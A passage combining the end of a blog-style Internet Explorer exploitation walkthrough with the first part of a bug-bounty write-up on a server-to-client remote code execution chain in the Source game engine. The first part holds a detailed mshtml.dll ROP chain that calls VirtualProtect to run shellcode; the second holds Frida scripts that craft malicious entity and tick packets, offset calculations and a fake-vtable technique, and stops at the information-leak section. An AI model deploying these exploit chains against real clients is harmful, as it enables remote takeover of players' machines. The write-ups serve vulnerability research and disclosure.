rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpAddress, with the address of the shellcode

As we can see, we have now taken care of the lpAddress parameter.

Next up is the size of our shellcode. We will be specifying 0x401 bytes for our shellcode, as this is more than enough for a shell.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x401 in EAX
rop += "\ufbff\uffff";                     // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual size of the shellcode in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for dwSize, with the size of our shellcode

Similar to last time, we know we cannot place 0x00000401 on the stack, as it contains NULL bytes. Instead, we load the negative representation into EAX and negate it. We also know the dwSize parameter placeholder is 4 bytes after the lpAddress parameter placeholder. We increase ECX, which has the address of the lpAddress placeholder, by 4 bytes to place the dwSize placeholder in ECX. Then, we leverage the same arbitrary write gadget again.

Perfect! We will leverage the exact same routine for the flNewProtect parameter. Instead of the negative representation of 0x401, this time we need to place 0x40 into EAX, which corresponds to the memory constant PAGE_EXECUTE_READWRITE.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x40 (PAGE_EXECUTE_READWRITE) in EAX
rop += "\uffc0\uffff";             // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual memory constraint PAGE_EXECUTE_READWRITE in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for flNewProtect, with PAGE_EXECUTE_READWRITE

Great! The last thing we need to do is overwrite the last parameter placeholder, lpflOldProtect, with any writable address. The .data section of a PE has memory that is readable and writable, so this is where we will look for a writable address.

The end of most sections in a PE contains NULL bytes, and that is our target here, which ends up being the address 7515c010. The image above shows us the .data section begins at mshtml+534000. We can also see it is 889C bytes in size. Knowing this, we can just access .data+8000, which should be near the end of the section.
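
As a hedged back-of-the-envelope check (assuming mshtml.dll is loaded at 0x74c20000 in this session, which lines up with the IAT pointer referenced earlier), the chosen address works out as follows:

// Hedged arithmetic, assuming an mshtml.dll base address of 0x74c20000 for this session:
//   0x74c20000 + 0x534000 (.data RVA) = 0x75154000   (start of .data)
//   0x75154000 + 0x8000               = 0x7515c000   (near the end of the 0x889c-byte section)
//   0x7515c010 falls inside that NULL-filled region, making it a safe scratch address for lpflOldProtect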

The routine here is identical to the previous two ROP routines, except there is no negation operation that needs to take place. We simply just need to pop this address into EAX and leverage our same, trusty arbitrary write gadget to overwrite the last parameter placeholder.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place a writable .data section address into EAX for lpflOldProtect
rop += "\uc010\u7515";             // Value from above (7515c010)
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpflOldProtect, with an address that is writable

Awesome! We have fully instrumented our call to VirtualProtect. All that is left now is to kick off execution by returning into the VirtualProtect address on the stack. To do this, we will just need to load the stack address which points to VirtualProtect into EAX. From there, we can execute an xchg eax, esp ; ret gadget, just like at the beginning of our ROP chain, to return back into the VirtualProtect address, kicking off our function call. We know currently ECX contains the stack address pointing to the last parameter, lpflOldProtect.

We can see that our current value in ECX is 0x14 bytes in front of the VirtualProtect stack address. This means we can leverage several dec ecx ; ret ROP gadgets to get ECX 0x14 bytes lower. From there, we can then move the ECX register into the EAX register, where we can perform the exchange.

rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the stack address of VirtualProtect into EAX
rop += "\ua1ea\u74c7";                     // xchg esp, eax ; ret (74c7a1ea) (mshtml.dll) Kick off the function call

We can also replace our shellcode with some software breakpoints to confirm our ROP chain worked.

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\uCCCC\uCCCC";

for (i=0; i < 0x396/4-1; i++)
{
shellcode += "\uCCCC\uCCCC";
}

After ECX is decremented, we can see that it now contains the VirtualProtect stack address. This is then passed to EAX, which is then exchanged with ESP to load the function call into ESP! Then, the ret part of the gadget takes the value at ESP, which is VirtualProtect, loads it into EIP, and we get successful code execution!

After replacing our software breakpoints with meaningful shellcode, we successfully obtain remote access!

Conclusion

I know this was a very long-winded blog post. It has been a bit disheartening to see a lack of beginning-to-end walkthroughs on Windows browser exploitation, and I hope I can contribute my piece to helping out those who want to get into it but are intimidated, as I am myself. Even though we are working on legacy systems, I hope this can be of some use. If nothing else, this is how I document and learn. I am excited to continue to grow and learn more about browser exploitation! Until next time.

Peace, love, and positivity :-)

Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida

Introduction

Hey guys, it’s been a while. I have cool new information to share now that my bug bounty has finally gone through. This recent report contained a full server-to-client RCE chain which I’m proud of. Unlike my first submission, it links together two separate bugs to achieve code execution, one memory corruption and one infoleak, and was exploitable in all Source Engine 1 titles, including TF2, CS:GO, and L4D:2 (no game-specific functionality required!). In this bug hunting adventure, I wanted to spice things up a bit, so I added some extra constraints to the bugs I found/used, and experimented with the Frida framework as a way to interface with the engine through Typescript.

Problems with SourceMod (since the last post)

If you read my last blog post, you knew that I was using SourceMod as a way to script up my local dedicated server to test bugs I found for validity. While auditing this time around, it was quickly apparent that most of the obvious bugs in any of the original Source 2013 codebases were patched already. But, without confirming the bugs as fixed myself, I couldn’t rule out their validity, so a lot of my initial time was just spent scripting up SourceMod scripts and testing. While SourceMod itself already has a pretty fleshed-out scripting environment, it still used the SourcePawn language, which is a bit outdated compared to modern scripting languages. In addition, adding any functionality that wasn’t already in SourceMod required you to compile C++ plugins using their plugin API, which was sometimes tedious to work with. While SourceMod was very functional overall, I wanted to find something better. That’s why I decided to try out Frida after hearing good things from friends who worked in the mobile space.

Frida? On Windows?

One of the goals of this bug hunt was to try out Frida for testing PoCs and productizing the exploit. You might have heard about the Frida project before in the mobile hacking community where it really shines, but you might not have heard about it being used for exploiting desktop applications, especially on Windows! (did you know Frida fully supports Windows?)

Getting started with Frida was actually quite simple, because the architecture is simple. In Frida, you have a “client” and a “server”. The “client” (typically Python) selects a process to inject into, in this case hl2.exe, and injects the “server” (known as a Gadget) that will talk back and forth with the “client”. The “server”, executing inside the game, creates a rich Javascript environment with special bindings to read/write memory and hook code. To know more about how this works, check out the Frida Docs.
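
For a sense of how little glue is needed on the Windows side, here is a hedged sketch of a client using the frida-node bindings (the frida npm package) that injects an assumed agent.js compiled from the Typescript agent; it is illustrative rather than the exact harness used for this exploit.

// Hedged sketch: attach to the running game client and load a compiled agent script into it.
const frida = require('frida');
const fs = require('fs');

async function main() {
    // The "client" picks the target process; Frida injects the "server" (agent) into it.
    const session = await frida.attach('hl2.exe');
    const script = await session.createScript(fs.readFileSync('agent.js', 'utf8'));

    // Messages sent back from inside the game land here.
    script.message.connect(message => console.log(message));
    await script.load();
}

main().catch(console.error);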

After getting that simple client and server set up for Frida, I created a Typescript library which allowed me to interface with the Source Engine more easily. Those familiar with game engines know that very often the engine objects take advantage of C++ polymorphism, exposing their functionality through virtual functions. So, in order to work with these objects from Frida, I had to write some vtable wrapper helpers that allowed me to convert native pointer values into actual Typescript objects to call functions on.

An example of what these wrappers look like:

// Create a pointer to the IVEngineClient interface by calling CreateInterface exported by engine.dll
let client = IVEngineClient.CreateInterface()
log(`IVEngineClient: ${client.pointer}`)

// Call the vtable function to get the local client's net channel instance
let netchan = client.GetNetChannelInfo() as CNetChan
if (netchan.pointer.isNull()) {
    log(`Couldn't get NetChan.`)
    return;
}

Pretty slick! These wrappers helped me script up low-level C++ functionality with a handy little scripting interface.

The best part of Frida is really its hooking interface, Interceptor. You can hook native functions directly from within Frida, and it handles the entire process of running the Typescript hooks and marshalling arguments to and from the JS engine. This is the primary way you use Frida to introspect, and it worked great for hooking parts of the engine just to see the values of arguments and return values while executing normally.

I quickly learned that the Source engine tooling I had made could also be injected into both a client (hl2.exe) and a server (srcds.exe) at the same time, without any real modification. Therefore, I could write a single PoC that instrumented both the client and server to prove the bug. The server would generate and send some network packets and the client would be hooked to see how it accepted the input. This dual-scripting environment allowed me to instrument practically all of the logic and communication I needed to ensure the prospective bugs I discovered were fully functional and unpatched.

Lastly, I decided to create a fairly novel Frida extension module that utilized the ret-sync project to communicate with a loaded copy of IDA at runtime. What this lets me do is assign names to functions inside of my IDA database and have Frida reach out through the ret-sync protocol to my IDA instance to get their addresses. The intent was to make the exploit scripts much more stable between game binary updates (which happen every few days for games like CS:GO).

Here’s an example of hooking a function by IDA symbol using my ret-sync extension. The script dynamically asks my IDA instance where CGameClient::ProcessSignonStateMsg exists inside engine.dll in the current process, hooks it, and then does some functionality with some engine objects:

// Hook when new clients are connecting and wait for them to spawn in to begin exploiting them. 
// This function is called every time a client transitions from one state to the next 
//     while loading into the server.
let signonstate_fn = se.util.require_symbol("CGameClient::ProcessSignonStateMsg")
Interceptor.attach(signonstate_fn, {
    onEnter(args) {
        console.log("Signon state: " + args[0].toInt32())

        // Check to make sure they're fully spawned in
        let stateNumber = args[0].toInt32()
        if (stateNumber != SIGNONSTATE_FULL) { return; }

        // Give their client a bit of time to load in, if it's slow.
        Thread.sleep(1)

        // Get the CGameClient instance, then get their netchannel
        let thisptr = (this.context as Ia32CpuContext).ecx;
        let asNetChan = new CGameClient(thisptr.add(0x4)).GetNetChannel() as CNetChan;
        if (asNetChan.pointer.isNull()) {
            console.log("[!] Could not get CNetChan for player!")
            return;
        }
        [...]
    }
})

Now, if the game updates, this script will still function so long as I have an IDA database for engine.dll open with CGameClient::ProcessSignonStateMsg named inside of it. The named symbols can be ported over between engine updates using BinDiff automagically, making it easy to automatically port offsets as the game updates!

All in all, my experience with Frida was awesome and its extensibility was wonderful. I plan to use Frida for all sorts of exploitation and VR activities to follow, and will continue to use it with any more Source adventures in the foreseeable future. I encourage readers with backgrounds with pwntools and CTFing to consider trying out Frida against desktop binaries. I gained a lot from learning it, and I feel like the desktop reversing/VR/exploitation community should really look to adopt it as much as the mobile community has!

Okay, enough about Frida. Talk about Source bugs!

There’s a lot of bugs in Source. It’s a very buggy engine. But not all bugs are made equal, and only some bugs are worth attempting to chain together. The easy type of bug to exploit in the engine is the basic stack-based buffer overflow. If you read my last blog post, you saw that Source typically compiles without any stack protections against buffer overflows. Therefore, it’s trivial to gain control of the instruction pointer and begin ROP-ing for as long as you have a silly string bug affecting the stack.

In CS:GO, the classic method of exploiting these type of bugs is to exploit some buffer overflow, build a ROP using the module xinput.dll which has ASLR marked as disabled, and execute shellcode on that alone. In Windows, DLLs can essentially mark themselves as not being subject to ASLR. Typically you will only find these on DLLs compiled with ancient versions of the MSVC compiler toolchain, which I believe is the case with xinput.dll. This doesn’t mean that the module cannot be relocated to a new address. In fact, xinput.dll can actually be relocated to other addresses just fine, and sometimes can be found at different addresses depending on if another module’s load conflicts with the address xinput.dll asks to be loaded at. Basically this means that, due to the way xinput.dll asks to be loaded, the system will choose not to randomize its base address, making it inherently defeat ASLR as you always know generally where xinput.dll is going to be found in your victim’s memory. You can write one static ROP chain and use it unmodified on every client you wish to exploit.

In addition, since xinput.dll is always loaded into the games which use it, it is by far the easiest form of ASLR defeat in the engine. Valve doesn’t seem too concerned by this, as it’s been exploited over and over again throughout the years. Surprisingly though, in TF2, there is no xinput.dll to utilize for ASLR defeat. This actually makes TF2, which runs on the older Source engine version, significantly harder to exploit than CS:GO, their flagship game, because TF2 requires a pointer leak to defeat ASLR. Not a great design choice, I feel.

In the case of a server->client exploit, one of these exploits would typically look like:

  • Client connects to server
  • Server exploits stack-based buffer overflow in the client
  • Bug overwrites the stack with a ROP chain written against xinput and overwrites into the instruction pointer (no stack cookie)
  • Client begins executing gadgets inside of xinput to set up a call to ShellExecuteA or VirtualAlloc/VirtualProtect.
  • Client is running arbitrary code

If this reminds you of early 2000s era exploitation, you are correct. This is generally the level of difficulty one would find in entry level exploitation problems in CTF.

What if my target doesn’t have xinput.dll to defeat ASLR?

One would think: “Well, the engine is buggy already, that means that you can just find another infoleak bug and be done!” But it doesn’t quite work that way in practice. As others who participate in the program have found, finding an information leak is actually quite difficult. This is just due to the general architecture of the networking of the engine, which rarely relies on any kind of buffer copy operations. Packets in the engine are very small and don’t often have length values that are controlled by the other side of the connection. In addition, most larger buffers are allocated on the heap instead of the stack. Source uses a custom heap allocator, as most game engines do, and all heap allocations are implicitly zeroed before being given back to the caller, unlike your typical system malloc implementation. Any uninitialized heap memory is unfortunately not a valid target for an infoleak.

An option to getting around this information leak constraint is to focus on finding bugs which allow you to leverage the corruption itself to leak information. This is generally the path I would suggest for anyone looking to exploit the engine in games without xinput.dll, as finding the typical vanilla infoleak is much more difficult than finding good corruption and exploiting that alone to leak information.

Types of bugs that tend to be good for this kind of “all-in-one” corruption are:

  • Arbitrary relative pointer writes to pointers in global queryable objects
  • Heap overflows against a queryable object to cause controllable pointer writes
  • Use-after-free with a queryable object

Heap exploits are cool to write, but often their stability can be difficult to achieve due to the vast number of heap allocations happening at any given time. This makes carving out areas of heap memory for your exploit require careful consideration for specifically sized holes of memory and the timing at which these holes are made. This process is lovingly referred to as Heap Feng Shui. In this post, I do not go over how to exploit heap vulnerabilities on the Source engine, but I will note that, due to its custom allocator, the allocations are much more predictable than the default Windows 10 heap, which is a nice benefit for those looking to do heap corruption.

Also, notice the word queryable above. This means that, whatever you corrupt for your information leak, you need to ensure it can be queried over the network. Very few types of game objects can be queried arbitrarily. The best type of queryable object to work with in Source is the ConVar object, which represents a configurable console variable. Both the client and server can send requests to query the value of any ConVar object. The value sent back is either the integer value of the CVar or an arbitrary-length string value.

Bug Hunting - Struggling is fun!

This time around, I gave myself a few constraints to make the exploit process a bit more challenging, and therefore more fun:

  • The exploit must be memory corruption and must not be a trivial stack-based buffer overflow
  • The exploit must produce its own pointer leak, or chain another bug to infoleak
  • The exploit must work in all Source 1 games (TF2, CS:GO, L4D:2, etc.) and not require any special configuration of the client
  • The exploit must have a ~100% stability rate
  • The exploit must be written using Frida, and must be “one-click” automatically exploited on any client connected to the server

Given these constraints, I ruled out quite a few bugs. Most of these were because they were trivial stack-based buffer overflows, or present in only one game but not the other.

Here’s what I eventually settled on for my chain:

  • Memory Corruption - An array index under/overflow that allowed for one-shot arbitrary execute of an address in the low-level networking code
  • Information Leak - A stack-based information leak in file transfers that leveraged a “bug” in the ZIP file parser for the map file format (BSP)

I would say the general length of time to discover the memory corruption was about 1/10th of the time I spent finding the information leak. I spent around two months auditing code for information leaks, whereas the memory corruption bug became quickly obvious within a few days of auditing the networking code.

Memory Corruption - Arbitrary execute with CL_CopyExistingEntity

The vulnerability I used for memory corruption was the array index over/under-flow in the low-level networking function CL_CopyExistingEntity. This is a function called within the packet handler for the server->client packet named SVC_PacketEntities. In Source, the way data about changes to game objects is communicated is through the “delta” system. The server calculates what values have changed about an entity between two points in time and sends that information to your client in the form of a “delta”. This function is responsible for copying any changed variables of an existing game object from the network packet received from the server into the values stored on the client. I would consider this a very core part of the Source networking, which means that it exists across the board for all Source games. I have not verified it exists in older GoldSrc games, but I would not be surprised, considering this code and vulnerability are ancient and have existed for 15+ years untouched.

The function looks like so:

void CL_CopyExistingEntity( CEntityReadInfo &u )
{
    int start_bit = u.m_pBuf->GetNumBitsRead();

    IClientNetworkable *pEnt = entitylist->GetClientNetworkable( u.m_nNewEntity );
    if ( !pEnt )
    {
        Host_Error( "CL_CopyExistingEntity: missing client entity %d.\n", u.m_nNewEntity );
        return;
    }

    Assert( u.m_pFrom->transmit_entity.Get(u.m_nNewEntity) );

    // Read raw data from the network stream
    pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

u.m_nNewEntity is controlled arbitrarily by the network packet, therefore this first argument to GetClientNetworkable can be an arbitrary 32-bit value. Now let’s look at GetClientNetworkable:

IClientNetworkable* CClientEntityList::GetClientNetworkable( int entnum )
{
	Assert( entnum >= 0 );
	Assert( entnum < MAX_EDICTS );
	return m_EntityCacheInfo[entnum].m_pNetworkable;
}

As we see here, these Assert statements would typically check to make sure that this value is sane, and crash the game if it isn't. But this is not what happens in practice. In release builds of the game, Assert statements are not compiled in at all. This is for performance reasons, as the #1 goal of any game engine programmer is speed first, everything else second.

Anyway, these Assert statements do not prevent us from controlling entnum arbitrarily. m_EntityCacheInfo exists inside of a globally defined structure, entitylist, inside of client.dll. This object holds the client's central store of all data related to game entities. Since m_EntityCacheInfo is therefore at a static global offset, we can easily calculate the proper value of entnum for our exploit by locating the offset of m_EntityCacheInfo in any given version of client.dll and working out which entnum produces our target pointer.

Here is what an object inside of m_EntityCacheInfo looks like:

// Cached info for networked entities.
// NOTE: Changing this changes the interface between engine & client
struct EntityCacheInfo_t
{
	// Cached off because GetClientNetworkable is called a *lot*
	IClientNetworkable *m_pNetworkable;
	unsigned short m_BaseEntitiesIndex;	// Index into m_BaseEntities (or m_BaseEntities.InvalidIndex() if none).
	unsigned short m_bDormant;	// cached dormant state - this is only a bit
};

Altogether, this vulnerability allows us to return an arbitrary IClientNetworkable* from GetClientNetworkable, as long as the address it is read from is aligned to an 8-byte boundary (each EntityCacheInfo_t entry is 8 bytes). This will be important for future exploit chaining.

Lastly, the result of returning an arbitrary IClientNetworkable* is that there is immediately this function call on our controlled pEnt pointer:

pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

This is a virtual function call. This means that the generated code will offset into pEnt’s vtable and call a function. This looks like so in IDA:

image-20200507164606006

Notice call dword ptr [eax+24]. This implies that the vtable index is at 24 / 4 = 6, which is also important to know for future exploitation.

And that’s it, we have our first bug. This will allow us to control, within reason, the location of a fake object in the client to later craft into an arbitrary execute. But how are we going to create a fake object at a known location such that we can convince CL_CopyExistingEntity to call the address of our choice? Well, we can take advantage of the fact that the server can set any arbitrary value to a ConVar on a client, and most ConVar objects exist in globals defined inside of client.dll.

The definition of ConVar is:

class ConVar : public ConCommandBase, public IConVar

Where the general structure of a ConVar looks like:

ConCommandBase *m_pNext; [0x00]
bool m_bRegistered; [0x04]
const char *m_pszName; [0x08]
const char *m_pszHelpString; [0x0C]
int m_nFlags; [0x10]
ConVar *m_pParent; [0x14]
const char *m_pszDefaultValue; [0x18]
char *m_pszString; [0x1C]

In this bug, we're targeting m_pszString so that our crafted pointer lands directly on m_pszString. When the bug calls our function, it will believe that &m_pszString is the location of the object's pointer, and the string m_pszString points to will contain its vtable pointer. The engine will now believe that any value inside of the ConVar's string data is part of the object's structure. Then, it will call a function pointer at *((*m_pszString)+0x18). As long as the ConVar on the client is marked as FCVAR_REPLICATED, the server can set its value arbitrarily, giving us full control over the contents of m_pszString. If we point the vtable pointer to the right place, this will give us control over the instruction pointer!

m_pszString is at offset 0x1C in the above ConVar structure, but the terms of our vulnerability require that this pointer be aligned to an 8-byte boundary. Therefore, we need to find a suitable candidate ConVar that is both globally defined and replicated, so that m_pszString is correctly aligned for GetClientNetworkable to return it.

This can be seen by what GetClientNetworkable looks like in x64dbg:

image-20200507170851575

In the above, the pointer we can return is controlled as such:

ecx+eax*8+28 where ecx is entitylist, eax is controlled by us

With a bit of searching, I found that the ConVar sv_mumble_positionalaudio exists in client.dll and is replicated. Here it exists at 0x10C6B788 in client.dll:

image-20200507173708203

This means that to calculate the address of m_pszString, we add 0x1C: 0x10C6B788 + 0x1C = 0x10C6B7A4. In this build, entitylist is at an aligned offset of 4 (0xC580B4). So, now we can calculate if this candidate is aligned properly:

>>> 0x10c6b7a4 % 0x8
4

This might look wrong, but entitylist is actually aligned to a 0x04 boundary, so that will add an extra 0x04 to the above alignment, making this value successfully align to 0x08!
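
To make the arithmetic concrete, here is a rough Python sketch of the candidate calculation. This is illustrative only: the +0x28 displacement is read off the x64dbg view above, the +0x1C is the m_pszString offset, and the value actually sent in the packet (0x26DA below) additionally depends on how m_nNewEntity is encoded while the delta is parsed.

def candidate_entnum(entitylist_addr, convar_addr):
    # GetClientNetworkable reads its pointer from [entitylist + entnum*8 + 0x28],
    # so we want that slot to land exactly on the ConVar's m_pszString field (+0x1C)
    target = convar_addr + 0x1C          # &sv_mumble_positionalaudio->m_pszString
    assert target % 8 == 0, "m_pszString must sit on an 8-byte boundary"
    return (target - entitylist_addr - 0x28) // 8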

Now we’re good to go ahead and use the m_pszString value of sv_mumble_positionalaudio to fake our object’s vtable pointer by using the server to control the string data contents through ConVar replication.

In summary, this is the path the code above will take:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable
  • The code offsets the vtable to index 6 and calls the function at that index. We need to make sure we point the vtable at a place we control; otherwise we would only be controlling the vtable pointer and not the actual function address in the table.

But where are we going to point the vtable? Well, we don’t need much, just a location of a known place the server can control so we can write an address we want to execute. I did some searching and came across this:

bool NET_Tick::ReadFromBuffer( bf_read &buffer )
{
	VPROF( "NET_Tick::ReadFromBuffer" );

	m_nTick = buffer.ReadLong();
#if PROTOCOL_VERSION > 10
	m_flHostFrameTime = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
	m_flHostFrameTimeStdDeviation = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
#endif
	return !buffer.IsOverflowed();
}

As you might see, m_nTick is controlled by the contents of the NET_Tick packet directly. This means we can assign this to an arbitrary 32-bit value. It just so happens that this value is stored at a global as well! After some scripting up in Frida, I confirmed that this is indeed completely controllable by the NET_Tick packet from the server:

image-20200513141444074

The code to send this packet with my Frida bindings is quite simple too:

function SetClientTick(bf: bf_write, value: NativePointer) {
    bf.WriteUBitLong(net_Tick, NETMSG_BITS)

    // Tick count (Stored in m_ClientGlobalVariables->tickcount)
    bf.WriteLong(value.toInt32())

    // Write m_flHostFrameTime -> 1
    bf.WriteUBitLong(1, 16);

    // Write m_flHostFrameTimeStdDeviation -> 1
    bf.WriteUBitLong(1, 16);
}

Now we have a candidate location to point our vtable pointer. We just have to point it at &tickcount - 24 and the engine will believe that tickcount is the function that should be called in the vtable. After a bit of testing, here’s the resulting script which creates and sends the SVC_PacketEntities packet to the client to trigger the exploit:

// craft the netmessage for the PacketEntities exploit
function SendExploit_PacketEntities(bf: bf_write, offset: number) {
    bf.WriteUBitLong(svc_PacketEntities, NETMSG_BITS)

    // Max entries
    bf.WriteUBitLong(0, 11)

    // Is Delta?
    bf.WriteBit(0)

    // Baseline?
    bf.WriteBit(0)

    // # of updated entries?
    bf.WriteUBitLong(1, 11)

    // Length of update packet?
    bf.WriteUBitLong(55, 20)

    // Update baseline?
    bf.WriteBit(0)

    // Data_in after here
    bf.WriteUBitLong(3, 2) // our data_in is of type 32-bit integer

    // >>>>>>>>>>>>>>>>>>>> The out of bounds type confusion is here <<<<<<<<<<<<<<<<<<<<
    bf.WriteUBitLong(offset, 32)

    // enterpvs flag
    bf.WriteBit(0)

    // zero for the rest of the packet
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
}

Now we’ve got the following modified chain:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable. We point this at &tickcount - 6*4 which we control.
  • The code offsets the vtable to index 6, dereferences, and calls the “function”, which will be the value we put in tickcount.

This generally looks like this in the exploit script:

// The fake object pointer and the ROP chain are stored in this cvar
ReplicateCVar(pkts_to_send, "sv_mumble_positionalaudio", tickCountAddress)

// Set a known location inside of engine.dll so we can use it to point our vtable value to
SetClientTick(pkts_to_send, new NativePointer(0x41414141))

// Then use exploit in PacketEntities to fake the object pointer to point to sv_mumble_positionalaudio's string value
SendExploit_PacketEntities(pkts_to_send, 0x26DA) 

0x26DA was calculated above to be the necessary entnum value to cause the out-of-bounds and align us to sv_mumble_positionalaudio->m_pszString.

Finally, we can see the results of our efforts:

image-20200513142919977

As we can see here, 0x41414141 is being popped off the stack at the ret, giving us a one-shot arbitrary execute! What you can’t see here is that, further down on the stack, our entire packet is sitting there unchanged, giving us ample room for a ROP chain.

Now, all we need is a pivot, which can be easily found using the Ropper project. After finding an appropriate pivot, we now can begin crafting a ROP chain… except we are missing something important. We don’t know where any gadgets are located in memory, including our stack pivot! Up until now, everything we’ve done is with relative offsets, but now we don’t even know where to point the value of 0x41414141 to on the client, because the layout of the code is randomized by ASLR. The easy way out would be to load up CS:GO and use xinput.dll addresses for our ROP chain… but that would violate my arbitrary constraint that this exploit must work for all Source games.

This means we need to go infoleak hunting.

Leaking uninitialized stack memory using a tricky ZIP file bug

